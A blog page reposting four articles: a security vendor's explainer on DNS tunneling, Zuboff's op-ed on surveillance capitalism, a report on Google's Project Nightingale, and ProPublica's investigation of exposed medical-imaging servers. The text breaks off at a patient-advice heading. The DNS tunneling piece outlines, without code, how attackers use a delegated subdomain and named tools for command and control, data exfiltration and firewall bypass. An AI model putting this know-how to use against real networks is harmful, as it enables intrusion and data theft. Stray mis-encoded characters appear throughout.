Article 43

 

Privacy And Rights

Monday, March 09, 2020

DNS Tunneling

image: cybercrime

How Hackers Use DNS Tunneling to Own Your Network

By Ron Lifinski, Cyber Security Researcher
Cynet
October 22, 2018

DNS Tunneling

Most organizations have a firewall that acts as a filter between their sensitive internal networks and the threatening global Internet. DNS tunneling has been around for a while.  But it continues to cost companies and has seen hackers invest more time and effort developing tools.  A recent study[1] found that DNS attacks in the UK alone have risen 105% in the past year.  DNS tunneling is attractivehackers can get any data in and out of your internal network while bypassing most firewalls. Whether it֒s used to command and control (C&C) compromised systems, leak sensitive data outside, or to tunnel inside your closed network, DNS Tunneling poses a substantial risk to your organization. Heres everything you need to know about the attack, the tools and how to stop it.

Introduction

DNS tunneling has been around since the early 2000s, when NSTX[2] an easy to use tool has been published to the masses. Since then there was a clear trend - tighter firewall security led to more widespread DNS tunneling. By 2011 it had already been used by malware such as Morto[3] and Feederbot[4] for C&C, and by the popular malicious payload for point-of-sale systems FrameworkPOS[5] for credit card exfiltration.

Why It’s a Problem

DNS was originally made for name resolution and not for data transfer, so its often not seen as a malicious communications and data exfiltration threat. Because DNS is a well-established and trusted protocol, hackers know that organizations rarely analyze DNS packets for malicious activity. DNS has less attention and most organizations focus resources on analyzing web or email traffic where they believe attacks often take place. In reality, diligent endpoint monitoring is required to find and prevent DNS tunneling.

Furthermore, tunneling toolkits have become an industry and are wildly available on the Internet, so hackers don’t really need technical sophistication to implement DNS tunneling attacks.

Common Abuse Cases (and the tools that make them possible)

Malware command and control (C&C) Malware can use DNS Tunneling to receive commands from its control servers, and upload data to the internet without opening a single TCP/UDP connection to an external server. Tools like DNSCAT2 are made specifically used for C&C purposes.

Create a “firewall bypassing tunnel” - DNS Tunneling allows an attacker to place himself into the internal network by creating a complete tunnel. Tools like IODINE allow you to create a common network between devices by creating a full IPv4 tunnel.

Bypass captive portals for paid Wi-Fi A lot of captive portal systems allow all DNS traffic out, so it’s possible to tunnel IP traffic without paying a fee. Some commercial services even provide a server-side tunnel as a service. Tools like YOUR-FREEDOM are made specifically for escaping captive portals.

How It Works

image: dns tunnel

The attacker acquires a domain, for example, evilsite.com.

The attacker configures the domains name servers to his own DNS server.

The attacker delegates a subdomain, such as “tun.evilsite.com” and configures his machine as the subdomain’s authoritative DNS server.

Any DNS request made by the victim to “{data}.tun.evilsite.com” will end up reaching the attacker’s machine.

The attacker’s machine encodes a response that will get routed back to the victim’s machine.

A bidirectional data transfer channel is achieved using a DNS tunneling tool.

References

[1] www dot infosecurity-magazine.com/news/dns-attack-costs-soar-105-in-uk

[2] thomer dot com/howtos/nstx.html

[3] www dot symantec.com/connect/blogs/morto-worm-sets-dns-record

[4] chrisdietri dot ch/post/feederbot-botnet-using-dns-command-and-control/

[5] www dot gdatasoftware.com/blog/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests

[6] github dot com/iagox86/dnscat

[7] github dot com/yarrick/iodine

[8] heyoka dot sourceforge.net/

SOURCE

Posted by Elvis on 03/09/20 •
Section Privacy And Rights • Section Broadband Privacy
View (0) comment(s) or add a new one
Printable viewLink to this article
Home

Tuesday, January 28, 2020

The Age of Surveillance Capitalism

snooping pc

You Are Now Remotely Controlled

By Shoshana Zuboff
NY Times
January 24, 2020

The debate on privacy and law at the Federal Trade Commission was unusually heated that day. Tech industry executives argued that they were capable of regulating themselves and that government intervention would be “costly and counterproductive.” Civil libertarians warned that the companies data capabilities posed “an unprecedented threat” to individual freedom. One observed, “We have to decide what human beings are in the electronic age. Are we just going to be chattel for commerce?” A commissioner asked, “Where should we draw the line?” The year was 1997.

The line was never drawn, and the executives got their way. Twenty-three years later the evidence is in. The fruit of that victory was a new economic logic that I call “surveillance capitalism.” Its success depends upon one-way-mirror operations engineered for our ignorance and wrapped in a fog of misdirection, euphemism and mendacity. It rooted and flourished in the new spaces of the internet, once celebrated by surveillance capitalists as THE WORLD’S LARGEST UNGOVERNED SPACE”. But power fills a void, and those once wild spaces are no longer ungoverned. Instead, they are owned and operated by private surveillance capital and governed by its iron laws.

The rise of surveillance capitalism over the last two decades went largely unchallenged. “Digital” was fast, we were told, and stragglers would be left behind. It’s not surprising that so many of us rushed to follow the bustling White Rabbit down his tunnel into a promised digital Wonderland where, like Alice, we fell prey to delusion. In Wonderland, we celebrated the new digital services as free, but now we see that the surveillance capitalists behind those services regard us as the free commodity. We thought that we search Google, but now we understand that Google searches us. We assumed that we use social media to connect, but we learned that connection is how social media uses us. We barely questioned why our new TV or mattress had a privacy policy, but we’ve begun to understand that “privacy policies” are actually surveillance policies.

And like our forebears who named the automobile “horseless carriage” because they could not reckon with its true dimension, we regarded the internet platforms as “bulletin boards” where anyone could pin a note. Congress cemented this delusion in a statute, SECTION 230 of the 1996 Communications Decency Act, absolving those companies of the obligations that adhere to “publishers” or even to “speakers.”

Only repeated crises have taught us that these platforms are not bulletin boards but hyper-velocity global bloodstreams into which anyone may introduce a dangerous virus without a vaccine. This is how Facebook’s chief executive, Mark Zuckerberg, could legally REFUSE to remove a faked video of Speaker of the House Nancy Pelosi and later DOUBLE DOWN on this decision, announcing that political advertising would not be subject to fact-checking.

All of these delusions rest on the most treacherous hallucination of them all: the belief that privacy is private. We have imagined that we can choose our degree of privacy with an individual calculation in which a bit of personal information is traded for valued services a reasonable quid pro quo. For example, when Delta Air Lines piloted a biometric data system at the Atlanta airport, the company REPORTED that of nearly 25,000 customers who traveled there each week, 98 percent opted into the process, noting that the facial recognition option is saving an average of two seconds for each customer at boarding, or nine minutes when boarding a wide body aircraft.”

In fact the rapid development of facial recognition systems reveals the public consequences of this supposedly private choice. Surveillance capitalists have demanded the right to take our faces wherever they appear - on a city street or a Facebook page. The Financial Times reported that a Microsoft facial recognition training database of 10 million images plucked from the internet without anyone’s knowledge and supposedly limited to academic research was employed by companies like IBM and state agencies that included the United States and Chinese military. Among these were two Chinese suppliers of equipment to officials in Xinjiang, where members of the Uighur community live in open-air prisons under perpetual surveillance by facial recognition systems.

Privacy is not private, because the effectiveness of THESE and OTHER private or public surveillance and control systems depends upon the pieces of ourselves that we give up - or that are secretly stolen from us.

Our digital century was to have been democracy’s Golden Age. Instead, we enter its third decade marked by a stark new form of social inequality best understood as גepistemic inequality. It recalls a pre-Gutenberg era of extreme asymmetries of knowledge and the power that accrues to such knowledge, as the tech giants seize control of information and learning itself. The delusion of Ӕprivacy as private was crafted to breed and feed this unanticipated social divide. Surveillance capitalists exploit the widening inequity of knowledge for the sake of profits. They manipulate the economy, our society and even our lives with impunity, endangering not just individual privacy but democracy itself. Distracted by our delusions, we failed to notice this bloodless coup from above.

The belief that privacy is private has left us careening toward a future that we did not choose, because it failed to reckon with the profound distinction between a society that insists upon sovereign individual rights and one that lives by the social relations of the one-way mirror. The lesson is that privacy is public - it is a collective good that is and morally inseparable from the values of human autonomy and self-determination upon which privacy depends and without which a democratic society logically is unimaginable.

Still, the winds appear to have finally shifted. A fragile new awareness is dawning as we claw our way back up the rabbit hole toward home. Surveillance capitalists are fast because they seek neither genuine consent nor consensus. They rely on psychic numbing and messages of inevitability to conjure the helplessness, resignation and confusion that paralyze their prey. Democracy is slow, and that’s a good thing. Its pace reflects the tens of millions of conversations that occur in families, among neighbors, co-workers and friends, within communities, cities and states, gradually stirring the sleeping giant of democracy to action.

These conversations are occurring now, and there are many indications that lawmakers are ready to join and to lead. This third decade is likely to decide our fate. Will we make the digital future better, or will it make us worse? Will it be a place that we can call home?

Epistemic inequality is not based on what we can earn but rather on what we can learn. It is defined as unequal access to learning imposed by private commercial mechanisms of information capture, production, analysis and sales. It is best exemplified in the fast-growing abyss between what we know and what is known about us.

Twentieth-century industrial society was organized around the “division of labor,” and it followed that the struggle for economic equality would shape the politics of that time. Our digital century shifts society’s coordinates from a division of labor to a division of learning, and it follows that the struggle over access to knowledge and the power conferred by such knowledge will shape the politics of our time.

The new centrality of epistemic inequality signals a power shift from the ownership of the means of production, which defined the politics of the 20th century, to the ownership of the production of meaning. The challenges of epistemic justice and epistemic rights in this new era are summarized in three essential questions about knowledge, authority and power: Who knows? Who decides who knows? Who decides who decides who knows?

During the last two decades, the leading surveillance capitalists Google, later followed by Facebook, Amazon and Microsoft - helped to drive this societal transformation while simultaneously ensuring their ascendance to the pinnacle of the epistemic hierarchy. They operated in the shadows to amass huge knowledge monopolies by taking without asking, a maneuver that every child recognizes as theft. Surveillance capitalism begins by unilaterally staking a claim to private human experience as free raw material for translation into behavioral data. Our lives are rendered as data flows.

Early on, it was discovered that, unknown to users, even data freely given harbors rich predictive signals, a surplus that is more than what is required for service improvement. It isn’t only what you post online, but whether you use exclamation points or the color saturation of your photos; not just where you walk but the stoop of your shoulders; not just the identity of your face but the emotional states conveyed by your “microexpressions;” not just what you like but the pattern of likes across engagements. Soon this behavioral surplus was secretly hunted and captured, claimed as proprietary data.

The data are conveyed through complex supply chains of devices, tracking and monitoring software, and ECOSYSTEMS OF APPS and COMPANIES that specialize in niche data flows captured in secret. For example, TESTING BY THE WALL STREET JOURNAL SHOWED that Facebook receives heart rate data from the Instant Heart Rate: HR Monitor, menstrual cycle data from the Flo Period & Ovulation Tracker, and data that reveal interest in real estate properties from Realtor.com - all of it without the users’ knowledge.

These data flows empty into surveillance capitalists; computational factories, called “artificial intelligence,” where they are manufactured into behavioral predictions that are about us, but they are not for us. Instead, they are sold to business customers in a new kind of market that trades exclusively in human futures. Certainty in human affairs is the lifeblood of these markets, where surveillance capitalists compete on the quality of their predictions. This is a new form of trade that birthed some of the richest and most powerful companies in history.

In order to achieve their objectives, the leading surveillance capitalists sought to establish UNRIVALED DOMINANCE over the 99.9 PERCENT of the world’s information now rendered in digital formats that they helped to create. Surveillance capital has built most of the world’s LARGEST COMPUTER NETWORKS, data centers, populations of servers, undersea transmission cables, ADVANCED MICROCHIPS, and frontier machine intelligence, igniting AN ARMS RACE FOR THE 10,000 or so specialists on the planet who know how to coax knowledge from these vast new data continents.

With Google in the lead, the top surveillance capitalists seek to control labor markets in critical expertise, including data science and ANIMAL RESEARCH, elbowing out competitors such as start-ups, universities, high schools, municipalities, established corporations in other industries and less wealthy countries. In 2016, 57 percent of American computer science Ph.D. graduates took jobs in industry, while only 11 percent became tenure-track faculty members. It’s not just an American problem. In Britain, university administrators CONTEMPLATE a “missing generation” of data scientists. A Canadian scientist laments, “the power, the expertise, the data are all concentrated in the hands of a few companies.”

Google created the first insanely lucrative markets to trade in human futures, what we now know as online targeted advertising, based on their predictions of which ads users would click. Between 2000, when the new economic logic was just emerging, and 2004, when the company went public, revenues increased by 3,590 percent. This startling number represents the “surveillance dividend.” It quickly reset the bar for investors, eventually driving start-ups, apps developers and established companies to shift their business models toward surveillance capitalism. The promise of a fast track to outsized revenues from selling human futures drove this migration first to Facebook, then through the tech sector and now throughout the rest of the economy to industries as disparate as insurance, retail, finance, education, health care, real estate, entertainment and every product that begins with the word “smart” or service touted as “personalized.”

Even Ford, the birthplace of the 20th-century mass production economy, is on the trail of the surveillance dividend, proposing to meet the challenge of slumping car sales by reimagining Ford vehicles as a TRANSPORTATION OPERATING SYSTEM. As one analyst put it, Ford “could make a fortune monetizing data. They won’t need engineers, factories or dealers to do it. It’s almost pure profit.”

Surveillance capitalismҔs economic imperatives were refined in the competition to sell certainty. Early on it was clear that machine intelligence must feed on volumes of data, compelling economies of scale in data extraction. Eventually it was understood that volume is necessary but not sufficient. The best algorithms also require varieties of data economies of scope. This realization helped drive the җmobile revolution sending users into the real world armed with cameras, computers, gyroscopes and microphones packed inside their smart new phones. In the competition for scope, surveillance capitalists want your home and what you say and do within its walls. They want your car, your medical conditions, and the shows you stream; your location as well as all the streets and buildings in your path and all the behavior of all the people in your city. They want your voice and what you eat and what you buy; your childrenӔs play time and their schooling; your brain waves and your bloodstream. Nothing is exempt.

Unequal knowledge about us produces unequal power over us, and so epistemic inequality widens to include the distance between what we can do and what can be done to us. Data scientists describe this as the shift from monitoring to actuation, in which a critical mass of knowledge about a machine system enables the remote control of that system. Now people have become targets for remote control, as surveillance capitalists discovered that the most predictive data come from intervening in behavior to tune, herd and modify action in the direction of commercial objectives. This third imperative, economies of action,ғ has become an arena of intense experimentation. We are learning how to writethe music,ԓ one scientist said, and then we let the music make them dance.ԓ

This new power to make them danceԓ does not employ soldiers to threaten terror and murder. It arrives carrying a cappuccino, not a gun. It is a new instrumentarianԓ power that works its will through the medium of ubiquitous digital instrumentation to manipulate subliminal cues, psychologically target communications, impose default choice architectures, trigger social comparison dynamics and levy rewards and punishments all of it aimed at remotely tuning, herding and modifying human behavior in the direction of profitable outcomes and always engineered to preserve usersԗ ignorance.

We saw predictive knowledge morphing into instrumentarian power in Facebooks contagion experiments published in 2012 and 2014, when it planted subliminal cues and manipulated social comparisons on its pages, first to influence users to vote in midterm elections and later to make people feel sadder or happier. Facebook researchers celebrated the success of these experiments noting two key findings: that it was possible to manipulate online cues to influence real world behavior and feelings, and that this could be accomplished while successfully bypassing usersҒ awareness.

In 2016, the Google-incubated augmented reality game, Pokmon Go, tested economies of action on the streets. Game players did not know that they were pawns in the real game of behavior modification for profit, as the rewards and punishments of hunting imaginary creatures were used to herd people to the McDonalds, Starbucks and local pizza joints that were paying the company for ҩғfootfall, in exactly the same way that online advertisers pay for ԓclick through to their websites.

In 2017, a leaked Facebook documentacquired by The Australian exposed the corporationԒs interest in applying psychological insightsӔ from internal Facebook dataӔ to modify user behavior. The targets were 6.4 million young Australians and New Zealanders. By monitoring posts, pictures, interactions and internet activity in real time,Ӕ the executives wrote, Facebook can work out when young people feel ӑstressed, ґdefeated, ґoverwhelmed, ґanxious, ґnervous, ґstupid, ґsilly, ґuseless and a ґfailure.Ҕ This depth of information, they explained, allows Facebook to pinpoint the time frame during which a young person needs a confidence boostӔ and is most vulnerable to a specific configuration of subliminal cues and triggers. The data are then used to match each emotional phase with appropriate ad messaging for the maximum probability of guaranteed sales.

Facebook denied these practices, though a former product manager accused the company of lying through its teeth.Ӕ The fact is that in the absence of corporate transparency and democratic oversight, epistemic inequality rules. They know. They decide who knows. They decide who decides.

The public’s intolerable knowledge disadvantage is deepened by surveillance capitalists’ perfection of mass communications as gaslighting. Two examples are illustrative. On April 30, 2019 Mark Zuckerberg made a dramatic announcement at the company’
s annual developer conference, declaring, “The future is private.” A few weeks later, a Facebook litigator appeared before a federal district judge in California to thwart a user lawsuit over privacy invasion, arguing that the very act of using Facebook negates any reasonable expectation of privacy ԓas a matter of law. In May 2019 Sundar Pichai, chief executive of Google, wrote in The Times of his corporationsԒs commitment to the principle that privacy cannot be a luxury good.Ӕ Five months later Google contractors were found offering $5 gift cards to homeless people of color in an Atlanta park in return for a facial scan.

Facebooks denial invites even more scrutiny in light of another leaked company documentappearing in 2018. The confidential report offers rare insight into the heart of FacebookҒs computational factory, where a prediction engineӔ runs on a machine intelligence platform that ingests trillions of data points every day, trains thousands of modelsӔ and then deploys them to the server fleet for live predictions.Ӕ Facebook notes that its prediction serviceӔ produces more than 6 million predictions per second.Ӕ But to what purpose?

In its report, the company makes clear that these extraordinary capabilities are dedicated to meeting its corporate customers ғcore business challenges with procedures that link prediction, microtargeting, intervention and behavior modification. For example, a Facebook service called ԓloyalty prediction is touted for its ability to plumb proprietary behavioral surplus to predict individuals who are ԓat risk of shifting their brand allegiance and alerting advertisers to intervene promptly with targeted messages designed to stabilize loyalty just in time to alter the course of the future.

That year a young man named Christopher Wylie turned whistle-blower on his former employer, a political consultancy known as Cambridge Analytica. ԓWe exploited Facebook to harvest millions of peoples profiles,Ҕ Wylie admitted, and built models to exploit what we knew about them and target their inner demons.Ӕ Mr. Wylie characterized those techniques as information warfare,Ӕ correctly assessing that such shadow wars are built on asymmetries of knowledge and the power it affords. Less clear to the public or lawmakers was that the political firms strategies of secret invasion and conquest employed surveillance capitalismҒs standard operating procedures to which billions of innocent usersӔ are routinely subjected each day. Mr. Wylie described this mirroring process, as he followed a trail that was already cut and marked. Cambridge Analyticas real innovation was to pivot the whole undertaking from commercial to political objectives.

In other words, Cambridge Analytica was the parasite, and surveillance capitalism was the host. Thanks to its epistemic dominance, surveillance capitalism provided the behavioral data that exposed the targets for assault. Its methods of behavioral microtargeting and behavioral modification became the weapons. And it was surveillance capitalism’s lack of accountability for content on its platform afforded by Section 230 that provided the opportunity for the stealth attacks designed to trigger the inner demons of unsuspecting citizens.

Its not just that epistemic inequality leaves us utterly vulnerable to the attacks of actors like Cambridge Analytica. The larger and more disturbing point is that surveillance capitalism has turned epistemic inequality into a defining condition of our societies, normalizing information warfare as a chronic feature of our daily reality prosecuted by the very corporations upon which we depend for effective social participation. They have the knowledge, the machines, the science and the scientists, the secrets and the lies. All privacy now rests with them, leaving us with few means of defense from these marauding data invaders. Without law, we scramble to hide in our own lives, while our children debate encryption strategies around the dinner table and students wear masks to public protests as protection from facial recognition systems built with our family photos.

In the absence of new declarations of epistemic rights and legislation, surveillance capitalism threatens to remake society as it unmakes democracy. From below, it undermines human agency, usurping privacy, diminishing autonomy and depriving individuals of the right to combat. From above, epistemic inequality and injustice are fundamentally incompatible with the aspirations of a democratic people.

We know that surveillance capitalists work in the shadows, but what they do there and the knowledge they accrue are unknown to us. They have the means to know everything about us, but we can know little about them. Their knowledge of us is not for us. Instead, our futures are sold for othersҒ profits. Since that Federal Trade Commission meeting in 1997, the line was never drawn, and people did become chattel for commerce. Another destructive delusion is that this outcome was inevitable an unavoidable consequence of convenience-enhancing digital technologies. The truth is that surveillance capitalism hijacked the digital medium. There was nothing inevitable about it.

American lawmakers have been reluctant to take on these challenges for many reasons. One is an unwritten policy of דsurveillance exceptionalism forged in the aftermath of the Sept. 11 terrorist attacks, when the governmentԒs concerns shifted from online privacy protections to a new zeal for total information awareness.Ӕ In that political environment the fledgling surveillance capabilities emerging from Silicon Valley appeared to hold great promise.

Surveillance capitalists have also defended themselves with lobbying and forms of propaganda intended to undermine and intimidate lawmakers, confounding judgment and freezing action. These have received relatively little scrutiny compared to the damage they do. Consider two examples:

The first is the assertion that democracy threatens prosperity and innovation. Former Google chief executive Eric Schmidt explained in 2011, we took the position of “hands off” the internet. You know, “leave us alone.” The government can make regulatory mistakes that can slow this whole thing down, and we see that and we worry about it. This propaganda is recycled from the Gilded Age barons, whom we now call “robbers.” They insisted that there was no need for law when one had the law of survival of the fittest,” the “laws of capital” and the “law of supply and demand.”

Paradoxically, surveillance capital does not appear to drive innovation. A promising new era of economic research shows the critical role that government and democratic governance have played in innovation and suggests a lack of innovation in big tech companies like Google. Surveillance capitalism’s information dominance is not dedicated to the urgent challenges of carbon-free energy, eliminating hunger, curing cancers, ridding the oceans of plastic or flooding the world with well paid, smart, loving teachers and doctors. Instead, we see a frontier operation run by geniuses with vast capital and computational power that is furiously dedicated to the lucrative science and economics of human prediction for profit.

The second form of propaganda is the argument that the success of the leading surveillance capitalist firms reflects the real value they bring to people. But data from the demand side suggest that surveillance capitalism is better understood as a market failure. Instead of a close alignment of supply and demand, people use these services because they have no comparable alternatives and because they are ignorant of surveillance capitalism’s shadow operations and their consequences. Pew Research Center recently reported that 81 percent of Americans believe the potential risks of companies’ data collection outweigh the benefits, suggesting that corporate success depends upon coercion and obfuscation rather than meeting peoples real needs.

In his prizewinning history of regulation, the historian Thomas McCraw delivers a warning. Across the centuries regulators failed when they did not frame strategies appropriate to the particular industries they were regulating. Existing privacy and antitrust laws are vital but neither will be wholly adequate to the new challenges of reversing epistemic inequality.

These contests of the 21st century demand a framework of epistemic rights enshrined in law and subject to democratic governance. Such rights would interrupt data supply chains by safeguarding the boundaries of human experience before they come under assault from the forces of datafication. The choice to turn any aspect of oneӔs life into data must belong to individuals by virtue of their rights in a democratic society. This means, for example, that companies cannot claim the right to your face, or use your face as free raw material for analysis, or own and sell any computational products that derive from your face. The conversation on epistemic rights has already begun, reflected in a pathbreaking report from Amnesty International.

On the demand side, we can outlaw human futures markets and thus eliminate the financial incentives that sustain the surveillance dividend. This is not a radical prospect. For example, societies outlaw markets that trade in human organs, babies and slaves. In each case, we recognize that such markets are both morally repugnant and produce predictably violent consequences. Human futures markets can be shown to produce equally predictable outcomes that challenge human freedom and undermine democracy. Like subprime mortgages and fossil fuel investments, surveillance assets will become the new toxic assets.

In support of a new competitive landscape, lawmakers will need to champion new forms of collective action, just as nearly a century ago legal protections for the rights to organize, to strike and to bargain collectively united lawmakers and workers in curbing the powers of monopoly capitalists. Lawmakers must seek alliances with citizens who are deeply concerned over the unchecked power of the surveillance capitalists and with workers who seek fair wages and reasonable security in defiance of the precarious employment conditions that define the surveillance economy.

Anything made by humans can be unmade by humans. Surveillance capitalism is young, barely 20 years in the making, but democracy is old, rooted in generations of hope and contest.

Surveillance capitalists are rich and powerful, but they are not invulnerable. They have an Achilles heel: fear. They fear lawmakers who do not fear them. They fear citizens who demand a new road forward as they insist on new answers to old questions: Who will know? Who will decide who knows? Who will decide who decides? Who will writethe music, and who will dance?

Shoshana Zuboff (@ShoshanaZuboff) is professor emerita at Harvard Business School and the author of “The Age of Surveillance Capitalism.”

The Times is committed to publishing a diversity of letters to the editor. We’d like to hear what you think about this or any of our articles. Here are some tips. And here’s our email: .

Follow @privacyproject on Twitter and The New York Times Opinion Section on Facebook and Instagram.

SOURCE

Posted by Elvis on 01/28/20 •
Section Privacy And Rights • Section Dying America
View (0) comment(s) or add a new one
Printable viewLink to this article
Home

Tuesday, November 12, 2019

Project Nightingale

image: google

Google’s “Project Nightingale” analyzes medical records to create “Patient Search” for health providers

By Abner Li
9to5Google
Nov 2019

Beyond the ACQUISTION OF FITBIT earlier this month, Google’s health ambitions are multi-faceted and extend into services for hospitals and health providers. Such an effort named Project Nightingale was detailed today, along with the end product: Patient Search.

The Wall Street Journal today REPORTED on Project Nightingale, with Forbes providing more details on the effort, including screenshots.  Ascension - one of the country’s largest healthcare systems - is moving its patient records to Google Cloud. This complete health history includes lab results, doctor diagnoses, and hospitalization records.

In turn, Google is analyzing and compiling that data into a Patient Search tool that allows doctors and other health professionals to conveniently see all patient data on an overview page.

The page includes notes about patient medical issues, test results and medications, including information from scanned documents, according to presentations viewed by Forbes.

The interface is quite straightforward and not too different from hospitals that offer results directly to patients today.

Internally, the project is being developed within Google Cloud, and 150 Googlers reportedly have access to the data. This includes Google Brain, the companys internal AI research division. The WSJ describes another tool in development that uses machine learning to suggest possible patient treatment changes to doctors.

Google in this case is using the data, in part, to design new software, underpinned by advanced artificial intelligence and machine learning, that zeroes in on individual patients to suggest changes to their care.

That appears to be further off in the distance compared to ԒPatient Search, which is already deployed to Ascension facilities in Florida and Texas, with more locations planned this year. Google is apparently not charging Ascension for the work and could offer the tool to other health systems in the future.

When asked for comment, Google said Project Nightingale abides by all federal laws and that privacy protections are in place. Experts that spoke to the WSJ believe that this initiative is allowed under the Health Insurance Portability and Accountability Act (HIPPA).

SOURCE

Posted by Elvis on 11/12/19 •
Section Privacy And Rights • Section Broadband Privacy
View (0) comment(s) or add a new one
Printable viewLink to this article
Home

Wednesday, September 18, 2019

Your MRI

image: hippa

Maybe this explains why:

The treatment consent form included text that gives the hospital the ok to share any medical and personal information with any third party they wish, without restriction.
- Florida Hospital insists I let them do whatever they want with my medical records

Millions of Americans Medical Images and Data Are Available on the Internet. Anyone Can Take a Peek.
Hundreds of computer servers worldwide that store patient X-rays and MRIs are so insecure that anyone with a web browser or a few lines of computer code can view patient records. One expert warned about it for years.

ByJack Gillum, Jeff Kao and Jeff Larson
ProPublica
September. 17, 2019

Medical images and health data belonging to millions of Americans, including X-rays, MRIs and CT scans, are sitting unprotected on the internet and available to anyone with basic computer expertise.

The records cover more than 5 million patients in the U.S. and millions more around the world. In some cases, a snoop could use free software programs or just a typical web browser - to view the images and private data, an investigation by ProPublica and the German broadcaster Bayerischer Rundfunk found.

We identified 187 servers - computers that are used to store and retrieve medical data in the U.S. that were unprotected by passwords or basic security precautions. The computer systems, from Florida to California, are used in doctors’ offices, medical-imaging centers and mobile X-ray services.

“It’s not even hacking. It’s walking into an open door,” said Jackie Singh, a cybersecurity researcher and chief executive of the consulting firm Spyglass Security. Some medical providers started locking down their systems after we told them of what we had found.

Our review found that the extent of the exposure varies, depending on the health provider and what software they use. For instance, the server of U.S. company MobilexUSA displayed the names of more than a million patients all by typing in a simple data query. Their dates of birth, doctors and procedures were also included.

Alerted by ProPublica, MobilexUSA tightened its security last week. The company takes mobile X-rays and provides imaging services to nursing homes, rehabilitation hospitals, hospice agencies and prisons. “We promptly mitigated the potential vulnerabilities identified by ProPublica and immediately began an ongoing, thorough investigation,” MobilexUSA’s parent company said in a statement.

Another imaging system, tied to a physician in Los Angeles, allowed anyone on the internet to see his patients echocardiograms. (The doctor did not respond to inquiries from ProPublica.)

All told, medical data from more than 16 million scans worldwide was available online, including names, birthdates and, in some cases, Social Security numbers.

Experts say it’s hard to pinpoint who’s to blame for the failure to protect the privacy of medical images. Under U.S. law, health care providers and their business associates are legally accountable for securing the privacy of patient data. Several experts said such exposure of patient data could violate the Health Insurance Portability and Accountability Act, or HIPAA, the 1996 law that requires health care providers to keep Americans’ health data confidential and secure.

Although ProPublica found no evidence that patient data was copied from these systems and published elsewhere, the consequences of unauthorized access to such information could be devastating. Medical records are one of the most important areas for privacy because they’re so sensitive. Medical knowledge can be used against you in malicious ways: to shame people, to blackmail people, said Cooper Quintin, a security researcher and senior staff technologist with the Electronic Frontier Foundation, a digital-rights group.

“This is so utterly irresponsible,” he said.

The issue should not be a surprise to medical providers. For years, one expert has tried to warn about the casual handling of personal health data. Oleg Pianykh, the director of medical analytics at Massachusetts General Hospital’s radiology department, said medical imaging software has traditionally been written with the assumption that patients data would be secured by the customer’s computer security systems.

But as those networks at hospitals and medical centers became more complex and connected to the internet, the responsibility for security shifted to network administrators who assumed safeguards were in place. “Suddenly, medical security has become a do-it-yourself project,” Pianykh wrote in a 2016 research paper he published in a medical journal.

ProPublicas investigation built upon findings from Greenbone Networks, a security firm based in Germany that identified problems in at least 52 countries on every inhabited continent. GreenboneҒs Dirk Schrader first shared his research with Bayerischer Rundfunk after discovering some patients health records were at risk. The German journalists then approached ProPublica to explore the extent of the exposure in the U.S.

Schrader found five servers in Germany and 187 in the U.S. that made patients’ records available without a password. ProPublica and Bayerischer Rundfunk also scanned Internet Protocol addresses and identified, when possible, which medical provider they belonged to.

ProPublica independently determined how many patients could be affected in America, and found some servers ran outdated operating systems with known security vulnerabilities. Schrader said that data from more than 13.7 million medical tests in the U.S. were available online, including more than 400,000 in which X-rays and other images could be downloaded.

The privacy problem traces back to the medical professions shift from analog to digital technology. Long gone are the days when film X-rays were displayed on fluorescent light boards. Today, imaging studies can be instantly uploaded to servers and viewed over the internet by doctors in their offices.

In the early days of this technology, as with much of the internet, little thought was given to security. The passage of HIPAA required patient information to be protected from unauthorized access. Three years later, the medical imaging industry published its first security standards.

Our reporting indicated that large hospital chains and academic medical centers did put security protections in place. Most of the cases of unprotected data we found involved independent radiologists, medical imaging centers or archiving services.

One German patient, Katharina Gaspari, got an MRI three years ago and said she normally trusts her doctors. But after Bayerischer Rundfunk showed Gaspari her images available online, she said: “Now, I am not sure if I still can.” The German system that stored her records was locked down last week.

We found that some systems used to archive medical images also lacked security precautions. Denver-based Offsite Image left open the names and other details of more than 340,000 human and veterinary records, including those of a large cat named ԓMarshmellow, ProPublica found. An Offsite Image executive told ProPublica the company charges clients $50 for access to the site and then $1 per study. ԓYour data is safe and secure with us, Offsite ImageԒs website says.

The company referred ProPublica to its tech consultant, who at first defended Offsite Images security practices and insisted that a password was needed to access patient records. The consultant, Matthew Nelms, then called a ProPublica reporter a day later and acknowledged Offsite ImageҒs servers had been accessible but were now fixed.

“We were just never even aware that there was A POSSIBILITY that could even happen,” Nelms said.

In 1985, an industry group that included radiologists and makers of imaging equipment created a standard for medical imaging software. The standard, which is now called DICOM, spelled out how medical imaging devices talk to each other and share information.

We shared our findings with officials from the Medical Imaging & Technology Alliance, the group that oversees the standard. They acknowledged that there were hundreds of servers with an open connection on the internet, but suggested the blame lay with the people who were running them.

Even though it is a comparatively small number,Ӕ the organization said in a statement, it may be possible that some of those systems may contain patient records. Those likely represent bad configuration choices on the part of those operating those systems.Ӕ

Meeting minutes from 2017 show that a working group on security learned of Pianykhs findings and suggested meeting with him to discuss them further. That ғaction item was listed for several months, but Pianykh said he never was contacted. The medical imaging alliance told ProPublica last week that the group did not meet with Pianykh because the concerns that they had were sufficiently addressed in his article. They said the committee concluded its security standards were not flawed.

Pianykh said that misses the point. ItԒs not a lack of standards; its that medical device makers donҒt follow them. Medical-data security has never been soundly built into the clinical data or devices, and is still largely theoretical and does not exist in practice,Ӕ Pianykh wrote in 2016.

ProPublicas latest findings follow several other major breaches. In 2015, U.S. health insurer Anthem Inc. revealed that private data belonging to more than 78 million people was exposed in a hack. In the last two years, U.S. officials have reported that more than 40 million people have had their medical data compromised, according to an analysis of records from the U.S. Department of Health and Human Services.

Joy Pritts, a former HHS privacy official, said the government isn’t tough enough in policing patient privacy breaches. She cited an April announcement from HHS that lowered the maximum annual fine, from $1.5 million to $250,000, for whats known as “corrected willful neglect” - the result of conscious failures or reckless indifference that a company tries to fix. She said that large firms would not only consider those fines as just the cost of doing business, but that they could also negotiate with the government to get them reduced. A ProPublica examination in 2015 found few consequences for repeat HIPAA offenders.

A spokeswoman for HHS Office for Civil Rights, which enforces HIPAA violations, said it wouldn’t comment on open or potential investigations.

“What we typically see in the health care industry is that there is Band-Aid upon Band-Aid applied to legacy computer systems,” said Singh, the cybersecurity expert. She said it’s a “shared responsibility: among manufacturers, standards makers and hospitals to ensure computer servers are secured.

“It’s 2019,” she said. “There’s no reason for this.”

How Do I Know if My Medical Imaging Data is Secure?

If you are a patient:

